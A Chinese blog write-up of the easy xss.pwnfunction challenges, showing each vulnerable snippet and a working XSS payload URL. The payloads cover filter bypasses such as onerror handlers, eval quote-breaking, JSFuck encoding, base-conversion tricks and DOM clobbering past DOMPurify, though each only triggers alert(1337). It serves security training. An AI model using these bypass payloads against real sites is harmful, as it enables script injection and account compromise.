xss.pwnfunction-Easy

最新推荐文章于 2024-09-23 23:39:34 发布
最新推荐文章于 2024-09-23 23:39:34 发布
阅读量706 收藏 26
点赞数 28
文章标签: xss 前端 学习 渗透 dom型xss
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/banliyaoguai/article/details/141277323
版权

目录

Ma Spaghet

代码

payload构造

结果

Jefff

代码

 payload构造

方法一

方法二

结果

方法一

方法二

Ugandan Knuckles

代码

payload构造

结果

Ricardo Milos

代码

payload构造

 结果

Ah That's Hawt

代码

payload构造

结果

 Ligma

代码

payload构造

结果

Mafia

代码

payload构造

方法一

方法二

结果

方法一

方法二

Ok, Boomer

代码

payload构造

结果

Ma Spaghet

代码

<!-- Challenge -->
<h2 id="spaghet"></h2>
<script>
    spaghet.innerHTML = (new URL(location).searchParams.get('somebody') || "Somebody") + " Toucha Ma Spaghet!"
</script>

payload构造

在innerHTML中官方限制了<script>标签,所以payload我们使用img和onerror属性

https://sandbox.pwnfunction.com/warmups/ma-spaghet.html?somebody=%3Cimg%20src=1%20onerror=%22alert(1337)%22%3E

结果

Jefff

代码

<!-- Challenge -->
<h2 id="maname"></h2>
<script>
    let jeff = (new URL(location).searchParams.get('jeff') || "JEFFF")
    let ma = ""
    eval(`ma = "Ma name ${jeff}"`)
    setTimeout(_ => {
        maname.innerText = ma
    }, 1000)
</script>

 payload构造

方法一

上述代码出问题的地方应该在eval这个地方

我们先可以将eval中双引号闭合然后再写我们的payload

https://sandbox.pwnfunction.com/warmups/jefff.html?jeff=aaaa%22;alert(1337);%22

方法二

同样也是闭合,不过这里在;后面添加-,这样就是jeff将输入的语据看成一句执行,如下图

测试了一下去掉;也可以执行

https://sandbox.pwnfunction.com/warmups/jefff.html?jeff=aaaa%22;-alert(1337);-%22

结果

方法一

方法二

Ugandan Knuckles

代码

<!-- Challenge -->
<div id="uganda"></div>
<script>
    let wey = (new URL(location).searchParams.get('wey') || "do you know da wey?");
    wey = wey.replace(/[<>]/g, '')
    uganda.innerHTML = `<input type="text" placeholder="${wey}" class="form-control">`
</script>

payload构造

观察代码发现过滤了一个<>,那么我们闭合input后执行<script>alert(1)</script>的想法破灭了。

我们可以使用标签中的移到焦点执行命令和自动追踪焦点的属性达成我们的目的

https://sandbox.pwnfunction.com/warmups/da-wey.html?wey=aaa%22%20onfocus=alert(1337)%20autofocus=%22

结果

Ricardo Milos

代码



<!-- Challenge -->
<form id="ricardo" method="GET">
    <input name="milos" type="text" class="form-control" placeholder="True" value="True">
</form>
<script>
    ricardo.action = (new URL(location).searchParams.get('ricardo') || '#')
    setTimeout(_ => {
        ricardo.submit()
    }, 2000)
</script>

payload构造

这里我们使用JavaScript伪协议来进行提交

https://sandbox.pwnfunction.com/warmups/ricardo.html?ricardo=javascript:alert(1)

 结果

Ah That's Hawt

代码

<!-- Challenge -->
<h2 id="will"></h2>
<script>
    smith = (new URL(location).searchParams.get('markassbrownlee') || "Ah That's Hawt")
    smith = smith.replace(/[\(\`\)\\]/g, '')
    will.innerHTML = smith
</script>

payload构造

这里过滤了()和`和\

我们看到innerHTML可以想到使用img标签,然后看到过滤了括号我们可以尝试使用location,然后使用%25编码%绕过()

https://sandbox.pwnfunction.com/warmups/thats-hawt.html?markassbrownlee=%3Cimg%20src=1%20onerror=location=%22javascript:alert%25281337%2529%22%3E

结果

 Ligma

代码

balls = (new URL(location).searchParams.get('balls') || "Ninja has Ligma")
balls = balls.replace(/[A-Za-z0-9]/g, '')
eval(balls)

payload构造

这里过滤了字母和数字,但是并没有限制长度。这里可以考虑使用编码,再下面网上进行编码

JSFuck - Write any JavaScript with 6 Characters: []()!+

然后拿过来使用,先进行javascript编码然后再进行url编码

https://sandbox.pwnfunction.com/warmups/ligma.html?balls=[][(![]%2B[])[%2B[]]%2B(![]%2B[])[!%2B[]%2B!%2B[]]%2B(![]%2B[])[%2B!%2B[]]%2B(!![]%2B[])[%2B[]]][([][(![]%2B[])[%2B[]]%2B(![]%2B[])[!%2B[]%2B!%2B[]]%2B(![]%2B[])[%2B!%2B[]]%2B(!![]%2B[])[%2B[]]]%2B[])[!%2B[]%2B!%2B[]%2B!%2B[]]%2B(!![]%2B[][(![]%2B[])[%2B[]]%2B(![]%2B[])[!%2B[]%2B!%2B[]]%2B(![]%2B[])[%2B!%2B[]]%2B(!![]%2B[])[%2B[]]])[%2B!%2B[]%2B[%2B[]]]%2B([][[]]%2B[])[%2B!%2B[]]%2B(![]%2B[])[!%2B[]%2B!%2B[]%2B!%2B[]]%2B(!![]%2B[])[%2B[]]%2B(!![]%2B[])[%2B!%2B[]]%2B([][[]]%2B[])[%2B[]]%2B([][(![]%2B[])[%2B[]]%2B(![]%2B[])[!%2B[]%2B!%2B[]]%2B(![]%2B[])[%2B!%2B[]]%2B(!![]%2B[])[%2B[]]]%2B[])[!%2B[]%2B!%2B[]%2B!%2B[]]%2B(!![]%2B[])[%2B[]]%2B(!![]%2B[][(![]%2B[])[%2B[]]%2B(![]%2B[])[!%2B[]%2B!%2B[]]%2B(![]%2B[])[%2B!%2B[]]%2B(!![]%2B[])[%2B[]]])[%2B!%2B[]%2B[%2B[]]]%2B(!![]%2B[])[%2B!%2B[]]]((!![]%2B[])[%2B!%2B[]]%2B(!![]%2B[])[!%2B[]%2B!%2B[]%2B!%2B[]]%2B(!![]%2B[])[%2B[]]%2B([][[]]%2B[])[%2B[]]%2B(!![]%2B[])[%2B!%2B[]]%2B([][[]]%2B[])[%2B!%2B[]]%2B(%2B[![]]%2B[][(![]%2B[])[%2B[]]%2B(![]%2B[])[!%2B[]%2B!%2B[]]%2B(![]%2B[])[%2B!%2B[]]%2B(!![]%2B[])[%2B[]]])[%2B!%2B[]%2B[%2B!%2B[]]]%2B(!![]%2B[])[!%2B[]%2B!%2B[]%2B!%2B[]]%2B(%2B(!%2B[]%2B!%2B[]%2B!%2B[]%2B[%2B!%2B[]]))[(!![]%2B[])[%2B[]]%2B(!![]%2B[][(![]%2B[])[%2B[]]%2B(![]%2B[])[!%2B[]%2B!%2B[]]%2B(![]%2B[])[%2B!%2B[]]%2B(!![]%2B[])[%2B[]]])[%2B!%2B[]%2B[%2B[]]]%2B([]%2B[])[([][(![]%2B[])[%2B[]]%2B(![]%2B[])[!%2B[]%2B!%2B[]]%2B(![]%2B[])[%2B!%2B[]]%2B(!![]%2B[])[%2B[]]]%2B[])[!%2B[]%2B!%2B[]%2B!%2B[]]%2B(!![]%2B[][(![]%2B[])[%2B[]]%2B(![]%2B[])[!%2B[]%2B!%2B[]]%2B(![]%2B[])[%2B!%2B[]]%2B(!![]%2B[])[%2B[]]])[%2B!%2B[]%2B[%2B[]]]%2B([][[]]%2B[])[%2B!%2B[]]%2B(![]%2B[])[!%2B[]%2B!%2B[]%2B!%2B[]]%2B(!![]%2B[])[%2B[]]%2B(!![]%2B[])[%2B!%2B[]]%2B([][[]]%2B[])[%2B[]]%2B([][(![]%2B[])[%2B[]]%2B(![]%2B[])[!%2B[]%2B!%2B[]]%2B(![]%2B[])[%2B!%2B[]]%2B(!![]%2B[])[%2B[]]]%2B[])[!%2B[]%2B!%2B[]%2B!%2B[]]%2B(!![]%2B[])[%2B[]]%2B(!![]%2B[][(![]%2B[])[%2B[]]%2B(![]%2B[])[!%2B[]%2B!%2B[]]%2B(![]%2B[])[%2B!%2B[]]%2B(!![]%2B[])[%2B[]]])[%2B!%2B[]%2B[%2B[]]]%2B(!![]%2B[])[%2B!%2B[]]][([][[]]%2B[])[%2B!%2B[]]%2B(![]%2B[])[%2B!%2B[]]%2B((%2B[])[([][(![]%2B[])[%2B[]]%2B(![]%2B[])[!%2B[]%2B!%2B[]]%2B(![]%2B[])[%2B!%2B[]]%2B(!![]%2B[])[%2B[]]]%2B[])[!%2B[]%2B!%2B[]%2B!%2B[]]%2B(!![]%2B[][(![]%2B[])[%2B[]]%2B(![]%2B[])[!%2B[]%2B!%2B[]]%2B(![]%2B[])[%2B!%2B[]]%2B(!![]%2B[])[%2B[]]])[%2B!%2B[]%2B[%2B[]]]%2B([][[]]%2B[])[%2B!%2B[]]%2B(![]%2B[])[!%2B[]%2B!%2B[]%2B!%2B[]]%2B(!![]%2B[])[%2B[]]%2B(!![]%2B[])[%2B!%2B[]]%2B([][[]]%2B[])[%2B[]]%2B([][(![]%2B[])[%2B[]]%2B(![]%2B[])[!%2B[]%2B!%2B[]]%2B(![]%2B[])[%2B!%2B[]]%2B(!![]%2B[])[%2B[]]]%2B[])[!%2B[]%2B!%2B[]%2B!%2B[]]%2B(!![]%2B[])[%2B[]]%2B(!![]%2B[][(![]%2B[])[%2B[]]%2B(![]%2B[])[!%2B[]%2B!%2B[]]%2B(![]%2B[])[%2B!%2B[]]%2B(!![]%2B[])[%2B[]]])[%2B!%2B[]%2B[%2B[]]]%2B(!![]%2B[])[%2B!%2B[]]]%2B[])[%2B!%2B[]%2B[%2B!%2B[]]]%2B(!![]%2B[])[!%2B[]%2B!%2B[]%2B!%2B[]]]](!%2B[]%2B!%2B[]%2B!%2B[]%2B[!%2B[]%2B!%2B[]])%2B(![]%2B[])[%2B!%2B[]]%2B(![]%2B[])[!%2B[]%2B!%2B[]])()((![]%2B[])[%2B!%2B[]]%2B(![]%2B[])[!%2B[]%2B!%2B[]]%2B(!![]%2B[])[!%2B[]%2B!%2B[]%2B!%2B[]]%2B(!![]%2B[])[%2B!%2B[]]%2B(!![]%2B[])[%2B[]]%2B([][(![]%2B[])[%2B[]]%2B(![]%2B[])[!%2B[]%2B!%2B[]]%2B(![]%2B[])[%2B!%2B[]]%2B(!![]%2B[])[%2B[]]]%2B[])[%2B!%2B[]%2B[!%2B[]%2B!%2B[]%2B!%2B[]]]%2B[%2B!%2B[]]%2B[!%2B[]%2B!%2B[]%2B!%2B[]]%2B[!%2B[]%2B!%2B[]%2B!%2B[]]%2B[!%2B[]%2B!%2B[]%2B!%2B[]%2B!%2B[]%2B!%2B[]%2B!%2B[]%2B!%2B[]]%2B([%2B[]]%2B![]%2B[][(![]%2B[])[%2B[]]%2B(![]%2B[])[!%2B[]%2B!%2B[]]%2B(![]%2B[])[%2B!%2B[]]%2B(!![]%2B[])[%2B[]]])[!%2B[]%2B!%2B[]%2B[%2B[]]])

结果

Mafia

代码过滤了`'"+-!\[]

代码

/* Challenge */
mafia = (new URL(location).searchParams.get('mafia') || '1+1')
mafia = mafia.slice(0, 50)
mafia = mafia.replace(/[\`\'\"\+\-\!\\\[\]]/gi, '_')
mafia = mafia.replace(/alert/g, '_')
eval(mafia)

payload构造

方法一

他没有过滤()我们可以尝试一下使用匿名函数来进行绕过,且使用ALERT绕过正则

Function(/ALERT(1337)/.source.toLowerCase())()


/ALERT(1337)/ 是一个正则表达式字面量。它匹配字符串 "ALERT(1337)"。
.source 属性返回正则表达式的源字符串,即 "ALERT(1337)"。
toLowerCase()
toLowerCase() 方法将字符串 "ALERT(1337)" 转换为 "alert(1337)"。

方法二

使用进制转换

8680439..toString(30) 先将数字 8680439 转换为一个字符串,并以基数 30 表示。这会将该数字以 30 进制表示。双点号 .. 是 JavaScript 的一个语法特性,确保 toString 被正确调用。结果是一个字符串,表示数字 8680439 在基数 30 下的表示形式。

为什么要使用30进制。咱们看一下16进制过了9数字以后是不是就开始使用字母来进行计数了,然后里面没有t就没有办法是用..tostring转化出来t,所以就最小是30进制,最大就到了36进制,这个是因为最大就36进制

https://sandbox.pwnfunction.com/warmups/mafia.html?mafia=eval(8680439..toString(30))(1337)

结果

方法一

方法二

Ok, Boomer

代码

这里有一个过滤框架DOMPurify用来防御DOM型xss,这个框架将任何xss的代码都过滤了



<!-- Challenge -->
<h2 id="boomer">Ok, Boomer.</h2>
<script>
    boomer.innerHTML = DOMPurify.sanitize(new URL(location).searchParams.get('boomer') || "Ok, Boomer")
    setTimeout(ok, 2000)
</script>

payload构造

由于过滤框架DOMPurify,我们不考虑 boomer.innerHTML = DOMPurify.sanitize(new URL(location).searchParams.get('boomer') || "Ok, Boomer")在这里注入

我们考虑在  setTimeout(ok, 2000)这里注入

这里就引入了一个新的知识点

我们先在控制台打印几个变量

在这里document取值name里面是什么,就会把那个标签取出来

这里有一个例子document.cookie这样就把<img name="cookie">取出来了

还比如说这样,取出来的body.appendChild

这里再介绍几个函数

getOwnPropertyNames(对应数组所有的名字)下面代码中是获取window下的所有名字

然后过滤了所有后缀为Element的名字

然后是用window取名字对应的值

然后要获取prototype携带的toString方法,且不能是Object.prototype下的字符串方法,因为后者返回的是一个元素,我们需要的是可控的字符串

Object.getOwnPropertyNames(window)
.filter(p => p.match(/Element$/))
.map(p => window[p])
.filter(p => p && p.prototype && p.prototype.toString 
!== Object.prototype.toString)

最后剩了两个属性

然后我们得到的两个都可以是用href进行转换

然后你是用上面的两个属性弹窗一个属性就会以字符串的形式展示href里面的值,如果你用的是从object继承来的toString,就会返回一个对象,例子如下

然后我们就可以借助这个特性构造payload了

如下,再boomer处传入id等于ok的a标签,然后 setTimeou就会获取a标签里面href的值,进行执行

然后由于有DOMPurify这个框架,我们还需要绕过,绕过就需要查看DOMPurify这个框架的白名单

https://sandbox.pwnfunction.com/warmups/ok-boomer.html?boomer=%3Ca%20id=%22ok%22%20href=%22tel:alert(1337)%22%3E

结果

板栗妖怪
关注
xss.pwnfunction(DOMXSS)靶场
duoba_an的博客
03-19 1126
环境进入该网站。
xss.pwnfunction靶场练习(easy难度)
m0_64998040的博客
08-18 188
官方文档显示HTML5中<script>标签被认为可能是跨站脚本而被禁用但是图片底下的<img>仍然可以xss攻击。所以我们使用<img src=‘x’ onerrer=‘alert(1)’>传参,显示警告1337。由上一页代码显示把<和>过滤了,同时这一页也比前两道多了一个可输入方框。使用闭合字段逃逸出eval()函数并执行alert()函数。本题只有2秒自动提交,没有其他过滤,正常写入xss即可。本题过滤了中括号和小括号,将符号进行URL编码。
pwnfunction xssgame-easy writeup
susu_xi的博客
05-07 492
0x02 Jefff js获取到页面的jeff参数,并通过eval赋值给ma,再将ma复制到maname的text jeff中构造payload,用双引号去闭合ma的赋值,执行构造的alert,再将后面双引号闭合 构造如下语句: eval(`ma = "Ma name"[分隔符]alert(1337)[分隔符]""`) 即eval会执行两个语句—— ma = “Ma name” 、alert...
xss.function靶场(easy)
丁航航的博客
08-17 814
网址:https://xss.pwnfunction.com/
中级xss绕过【xss Game】
Miracle_ze的博客
08-02 393
Element.innerHTML 属性设置或获取 HTML 语法表示的元素的后代。如果一个,, 或节点有一个文本子节点,该节点包含字符 (&), (),innerHTML 将这些字符分别返回为&,。使用Node.textContent 可获取一个这些文本节点内容的正确副本。eval() 函数会将传入的字符串当做 JavaScript 代码进行执行。...
XSS-复现dom破坏案例和靶场
山月不问人间事
08-18 1006
首先是传给wey一个值,然后赋值给变量let wey,然后这里过滤了<>尖括号,最后将我们的变量wey内容传给Uganda,显示在输入框中,Uganda也带一个inner HTML的属性,所以我们不能使用script标签,那就看看其他的思路;可以看到括号丢失 ,因为url在传参时,会将我们的特殊符号进行解码,但我们传递的是html的实体编码,所以问题出现在了这里,那么我们再将实体编码再进行次url编码。所以我们这里只能换一种思路,他不能加标签,那我们看能不能直接闭合ma,之后执行我们的代码。
XSS项目实战
qq_68389880的博客
08-17 881
innerText函数会将'<','>'进行实体编码转义;ok传入了,但是后面的函数值被删掉了,这是因为javascript对于DOMPurify框架来说是黑名单,我们需要找到这个框架对应的白名单;过滤了'(' ')' '`' '\';过滤了alert函数,可以选择切换为confirm函数,但是意义不大;这道题过滤了'<''>';①弹出'1337';①弹出'1337';①弹出'1337';①弹出'1337';①弹出'1337';①弹出'1337';①弹出'1337';①弹出'1337';
portswigger的Exploiting DOM clobbering to enable XSS
banliyaoguai的博客
08-18 1497
我们开始是没有头像的所以我们开始会走到window.defaultAvatar上,所以只要我们想办法构造一个 defaultAvatar.avatar就可以进行XSS了。所以下面构造的时候1后面要加双引号但是加双引号的时候会出现问题,无法闭合,我们尝试是用HTML实体编码。然后是用一个小技巧,是用一个不存在的伪协议,然后这个伪协议不存在,后面"就不会被编码。DOM破坏肯定是要看js的我们打开源码查看一下,发现了如下图的代码。然后我们借助一个js特性,看下面两张图id相同时不同的值的取法。
XSS GAME
weixin_63032002的博客
08-17 832
html编码 第一排为10进制,第二排为16进制,均可实现 alert(1337) <svg onload="alert(1337)"> --->最后一个()是为了执行前面的函数,因为过滤了小写,所以我们利用大写来绕过,其中的toLowerCase将大写变小写——js严格区分大小写。创造一个id=ok,然后自动调用tostring()方法,将href里面的值放入ok里面,两秒后执行。也就是将alert(1337)拿出放入()里面,得到eval(alert(1337))是一个事件处理器,它在动画开始时触发。
xss-labs-master.rar
05-09
"xss-labs-master.rar" 提供了一个针对XSS漏洞的专项练习平台,旨在帮助初学者及安全爱好者提升对XSS攻击的理解和防御能力。这个靶机资源共分为二十个关卡,由浅入深,逐步引导用户掌握XSS攻防的核心技巧。 一、XSS...
xss.js.zip
07-29
XSS(Cross-Site Scripting)攻击是一种常见的网络安全威胁,主要发生在Web应用中。它利用了网站的信任,将恶意脚本注入到网页中,当其他用户访问这些被篡改的页面时,恶意脚本会在用户的浏览器上执行,从而窃取用户...
xss-labs-master.zip(xss注入通关游戏/靶场)
03-21
`xss-labs-master.zip`包含了一个专门用于学习和实践XSS注入的通关游戏或靶场,对于网络安全测试人员来说,这是一个极好的学习资源。 **XSS分类** 1. **存储XSS**:也称为持久XSS,攻击者将恶意脚本存入服务器...
xss-filter-spring-boot-starter:springboot自动xss
05-17
xss-filter-spring-boot-starter springboot自动xss 使用方法在项目的pom.xml中加入依赖即口 <groupId>com.djk</groupId> <artifactId>xss-filter-spring-boot-starter <version>0.0.1 目前支持3种入参数xss...
xss.pwnfunction靶场
newlife1441的博客
07-31 975
靶场是验证我们学习情况和提升做题技巧很好的平台,这里将为大家介绍一个非常不错的xss靶场XSSGamehttps。
XSS闯关小游戏(前13关)
最新发布
w2vmany的博客
09-23 519
1.存在可控参数2.页面存在回显3.使用带有特殊字符的语句去测试,网站是否进行了实例化 ( 例如 '">123 )4.构造闭合,实现payload的逃逸。
XSSxss-labs靶场通关
qq_62987084的博客
09-22 795
xss-labs靶场通关详解
文件系统设计 - 开发文件系统 Store (上篇)
qq_44746132的博客
09-21 587
本章以一个基础的响应式Store类开始,对编辑器最核心的基础模块-文件系统管理进行开发设计,遵循面向接口编程的理念,设计文件系统的相关接口类定义。
webview2加载本地页面
qq_25160759的博客
09-23 600
推荐使用这种方式,加载速度比WebResourceRequested快(实测的确是快点),但是需要支持:ICoreWebView2_3。个人测试加载html字符串,对于html中引入了css和js,加载不太友好。这种方式是通过截获网络请求,然后返回需要的数据。以达到成功请求的假象。
http://xss.tesla-space.com/
07-27
XSS攻击是指攻击者向web页面的输入表单、URL或留言板等位置插入恶意JavaScript代码,以达到攻击者的目的。\[2\]根据引用\[1\]的描述,XSS攻击可以导致攻击者获取用户的cookies,从而以用户的身份进行任何操作。因此...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值